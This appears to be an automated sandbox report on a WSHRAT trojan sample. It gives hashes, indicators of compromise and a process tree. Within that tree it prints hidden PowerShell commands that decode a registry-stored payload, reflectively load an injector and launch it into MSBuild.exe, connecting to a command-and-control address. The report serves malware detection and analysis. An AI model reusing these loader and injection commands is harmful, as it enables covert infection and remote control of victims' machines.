wshrat | bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2

Analysis

max time kernel
118s
max time network
131s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
19-09-2023 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe
Size

2.0MB
MD5

263d8628ff6e9c99318da99bb42007f4
SHA1

c0450285843855e54b2b5aa7ee8d1a2f524218e9
SHA256

bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2
SHA512

93d6a334ea62a876bab4c2c904b515fae2de919f9d5813123fbf38a02e76f02f026528d8db031e01baa525edad242683a689418eab8d3f8aab489d55c45b8114
SSDEEP

1536:waXjwDPE6yzTBMfT9/8n+NwRw7ySsgWNybmXfaKHFjyRcf7tZ4G5tJJmmrvf/Fco:NYPFyzTBMfw+N/Zs/N4ovsWZ93co

Score

10^/10

wshrat trojan

Malware Config

Extracted

Family

wshrat

http://80.76.51.33:2606

Signatures

WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat

WSHRAT payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000700000001affb-10.dat	family_wshrat
behavioral1/files/0x000700000001affe-13.dat	family_wshrat

Blocklisted process makes network request 10 IoCs

flow	pid	Process
2	164	wscript.exe
3	164	wscript.exe
7	4612	wscript.exe
8	4612	wscript.exe
10	4612	wscript.exe
11	4612	wscript.exe
15	4612	wscript.exe
16	4612	wscript.exe
20	4612	wscript.exe
22	4612	wscript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
9	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 836 set thread context of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 4248 set thread context of 832	4248	powershell.exe	80

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
4828	powershell.exe
4828	powershell.exe
4828	powershell.exe
4248	powershell.exe
4248	powershell.exe
4248	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	4248	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
832	MSBuild.exe
832	MSBuild.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 836 wrote to memory of 3152	836	bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe	70
PID 3152 wrote to memory of 164	3152	Caspol.exe	71
PID 3152 wrote to memory of 164	3152	Caspol.exe	71
PID 3152 wrote to memory of 164	3152	Caspol.exe	71
PID 164 wrote to memory of 4612	164	wscript.exe	73
PID 164 wrote to memory of 4612	164	wscript.exe	73
PID 164 wrote to memory of 4612	164	wscript.exe	73
PID 4612 wrote to memory of 1632	4612	wscript.exe	74
PID 4612 wrote to memory of 1632	4612	wscript.exe	74
PID 4612 wrote to memory of 1632	4612	wscript.exe	74
PID 4612 wrote to memory of 4828	4612	wscript.exe	76
PID 4612 wrote to memory of 4828	4612	wscript.exe	76
PID 4612 wrote to memory of 4828	4612	wscript.exe	76
PID 4612 wrote to memory of 4248	4612	wscript.exe	78
PID 4612 wrote to memory of 4248	4612	wscript.exe	78
PID 4612 wrote to memory of 4248	4612	wscript.exe	78
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80
PID 4248 wrote to memory of 832	4248	powershell.exe	80

C:\Users\Admin\AppData\Local\Temp\bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe
"C:\Users\Admin\AppData\Local\Temp\bb1a60d48e67a57b363bc312e01f4d91a7dae7e4a11653156e554d468578e8f2.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:836
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3152
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Roaming\PmdRD.vbs"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:164
  - - C:\Windows\SysWOW64\wscript.exe
      "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Local\Temp\PmdRD.vbs"
      4⤵
      Blocklisted process makes network request
      Suspicious use of WriteProcessMemory
      PID:4612
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'80.76.51.33 2606 \"WSHRAT|44733149|RKSMUWZN|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/19/2023|Visual Basic-v3.4|NL:Netherlands\" 1'));"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4248
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        path 80.76.51.33 2606 "WSHRAT|44733149|RKSMUWZN|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/19/2023|Visual Basic-v3.4|NL:Netherlands" 1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
7762807cfa5ec91a983360ff87821fca

SHA1
fbf1704b42ffd4bf399321ec44e21a525fb54167

SHA256
4f5f720c5d2ce15c32ca2f530239b6d336d84453ab10c6421a49dc52361877af

SHA512
a7170f046e78c0158cf4e3cdcd7172604e5c12ded858b5df31f58203e8424e9d8363ae5e98e036c35857a9406ded574035d1c79d291abdcfe9e8b377ebefb8c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DZDMTHDJ\json[1].json

Filesize
323B

MD5
0c17abb0ed055fecf0c48bb6e46eb4eb

SHA1
a692730c8ec7353c31b94a888f359edb54aaa4c8

SHA256
f41e99f954e33e7b0e39930ec8620bf29801efc44275c1ee6b5cfa5e1be202c0

SHA512
645a9f2f94461d8a187261b736949df398ece5cfbf1af8653d18d3487ec1269d9f565534c1e249c12f31b3b1a41a8512953b1e991b001fc1360059e3fd494ec3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
850edf05309bbf9cad6ef8a0e0e1a0d7

SHA1
9b6ad25ba917c4bb725251884d865a2fd29bc176

SHA256
602aac8a949544af297df0db199472c999572ec4e5eb64d7183fe3ccc97833e8

SHA512
879a9bcce7f93f9b4ab901530eec5a85b691e51f34b1a5abc38b060fb54f28240fc290a381752a54c08d4fbc1f0d7a43461caab914fa95c36f9018e3297368af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
56ffece6e8ba5845daef4a25bf6a40e9

SHA1
c16c94ee204738d403454326e7ac16e494e987fe

SHA256
be66a2df1618a3475178f74be07e211dc8b629c37728e7b6ff3a4a2f78bfd9d6

SHA512
ad5fb30342613b8fbfbb3ab23899b0020ba0b6006dbfaae017e5cc335168da5e214798ebf0be7cffad2a2a89f3adec1d1f4373738f989419423f971b1b57575d

Download Submit
C:\Users\Admin\AppData\Local\Temp\PmdRD.vbs

Filesize
180KB

MD5
9bcc1d31eae798a11b1d50f46b1de92c

SHA1
8bc898b80ead2433ac20eaa9936d2e40ea1db01e

SHA256
cc2ca06bf02d0ba8b9ec6874b734bf6a39f84d536f6bb2d7cc5e3d577697e45b

SHA512
b0a13f056ce07f5bf1360cb9754759c499c1560ed19c684f50774d0d6f72e0669b9e10a243185d9c31555938ae2799a09222236d960fb36f935bda266b764d6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4lvrdbq.q2t.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wshsdk.zip

Filesize
12.4MB

MD5
d9a63dfd8b73629421bb44bcde09f312

SHA1
7855575c12eaee0e734f3901ca1da2931e9b587a

SHA256
9d5bb028794410fda9d1b3e0f8deb6beee5bd4e1e55340bd375a209c81dc98eb

SHA512
df195c22f7818569cc92e995846ab507caa30f341ac902cc8afe6f06ae4493709e7f80357c91cf14b21e58e2154e0b35f2154d8a313bf36fcff0b72b3a539cf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\wshsdk\Lib\site-packages\adodbapi\test\is64bit.py

Filesize
1KB

MD5
ca2cc8e73bbca371935bbc92ed18d567

SHA1
1adb458919e842cd78c72b1ff00e5e93cb6ef75e

SHA256
bea3f797921992fda45c19db41e10e3b325bcdd3ea35d35c1fa70535477ad9c1

SHA512
b63df3bad9272f45ba0f50e2c50aaed7a04eb1b000d5855d9f3a8e5c5f2d381c667b1e9c1e1f03f80584a7941a96992838664ae9dd25e1b8320e026da35b8223

Download Submit
C:\Users\Admin\AppData\Roaming\PmdRD.vbs

Filesize
180KB

MD5
9bcc1d31eae798a11b1d50f46b1de92c

SHA1
8bc898b80ead2433ac20eaa9936d2e40ea1db01e

SHA256
cc2ca06bf02d0ba8b9ec6874b734bf6a39f84d536f6bb2d7cc5e3d577697e45b

SHA512
b0a13f056ce07f5bf1360cb9754759c499c1560ed19c684f50774d0d6f72e0669b9e10a243185d9c31555938ae2799a09222236d960fb36f935bda266b764d6d

Download Submit
memory/832-119-0x0000000005420000-0x00000000054B2000-memory.dmp

Filesize
584KB

Download
memory/832-126-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download
memory/832-124-0x00000000053B0000-0x00000000053BA000-memory.dmp

Filesize
40KB

Download
memory/832-120-0x0000000005410000-0x0000000005420000-memory.dmp

Filesize
64KB

Download
memory/832-127-0x0000000005410000-0x0000000005420000-memory.dmp

Filesize
64KB

Download
memory/832-115-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download
memory/832-114-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/836-6-0x00000000731E0000-0x00000000738CE000-memory.dmp

Filesize
6.9MB

Download
memory/836-2-0x0000000003140000-0x0000000003152000-memory.dmp

Filesize
72KB

Download
memory/836-1-0x00000000731E0000-0x00000000738CE000-memory.dmp

Filesize
6.9MB

Download
memory/836-0-0x0000000000C50000-0x0000000000E58000-memory.dmp

Filesize
2.0MB

Download
memory/1632-49-0x000000000A040000-0x000000000A53E000-memory.dmp

Filesize
5.0MB

Download
memory/1632-48-0x0000000009810000-0x0000000009832000-memory.dmp

Filesize
136KB

Download
memory/1632-47-0x00000000097C0000-0x00000000097DA000-memory.dmp

Filesize
104KB

Download
memory/1632-54-0x000000000ABC0000-0x000000000B238000-memory.dmp

Filesize
6.5MB

Download
memory/1632-55-0x00000000072E0000-0x00000000072F0000-memory.dmp

Filesize
64KB

Download
memory/1632-59-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download
memory/1632-46-0x0000000009AA0000-0x0000000009B34000-memory.dmp

Filesize
592KB

Download
memory/1632-31-0x0000000008910000-0x0000000008986000-memory.dmp

Filesize
472KB

Download
memory/1632-18-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download
memory/1632-26-0x0000000008300000-0x0000000008650000-memory.dmp

Filesize
3.3MB

Download
memory/1632-19-0x00000000072E0000-0x00000000072F0000-memory.dmp

Filesize
64KB

Download
memory/1632-20-0x00000000071F0000-0x0000000007226000-memory.dmp

Filesize
216KB

Download
memory/1632-21-0x00000000072E0000-0x00000000072F0000-memory.dmp

Filesize
64KB

Download
memory/1632-30-0x0000000008BE0000-0x0000000008C2B000-memory.dmp

Filesize
300KB

Download
memory/1632-22-0x0000000007920000-0x0000000007F48000-memory.dmp

Filesize
6.2MB

Download
memory/1632-23-0x00000000078D0000-0x00000000078F2000-memory.dmp

Filesize
136KB

Download
memory/1632-24-0x00000000081A0000-0x0000000008206000-memory.dmp

Filesize
408KB

Download
memory/1632-25-0x0000000007FC0000-0x0000000008026000-memory.dmp

Filesize
408KB

Download
memory/1632-29-0x0000000008180000-0x000000000819C000-memory.dmp

Filesize
112KB

Download
memory/3152-9-0x00000000731E0000-0x00000000738CE000-memory.dmp

Filesize
6.9MB

Download
memory/3152-5-0x00000000731E0000-0x00000000738CE000-memory.dmp

Filesize
6.9MB

Download
memory/3152-3-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/4248-121-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download
memory/4248-93-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download
memory/4248-118-0x00000000074A0000-0x00000000074B0000-memory.dmp

Filesize
64KB

Download
memory/4248-113-0x0000000009E20000-0x0000000009EBC000-memory.dmp

Filesize
624KB

Download
memory/4248-94-0x00000000074A0000-0x00000000074B0000-memory.dmp

Filesize
64KB

Download
memory/4248-112-0x0000000009D20000-0x0000000009D2A000-memory.dmp

Filesize
40KB

Download
memory/4612-14188-0x00000000737C0000-0x00000000737C8000-memory.dmp

Filesize
32KB

Download
memory/4612-14224-0x000000006E200000-0x000000006E238000-memory.dmp

Filesize
224KB

Download
memory/4828-90-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download
memory/4828-89-0x0000000007230000-0x0000000007240000-memory.dmp

Filesize
64KB

Download
memory/4828-64-0x0000000007230000-0x0000000007240000-memory.dmp

Filesize
64KB

Download
memory/4828-65-0x0000000007230000-0x0000000007240000-memory.dmp

Filesize
64KB

Download
memory/4828-63-0x0000000071550000-0x0000000071C3E000-memory.dmp

Filesize
6.9MB

Download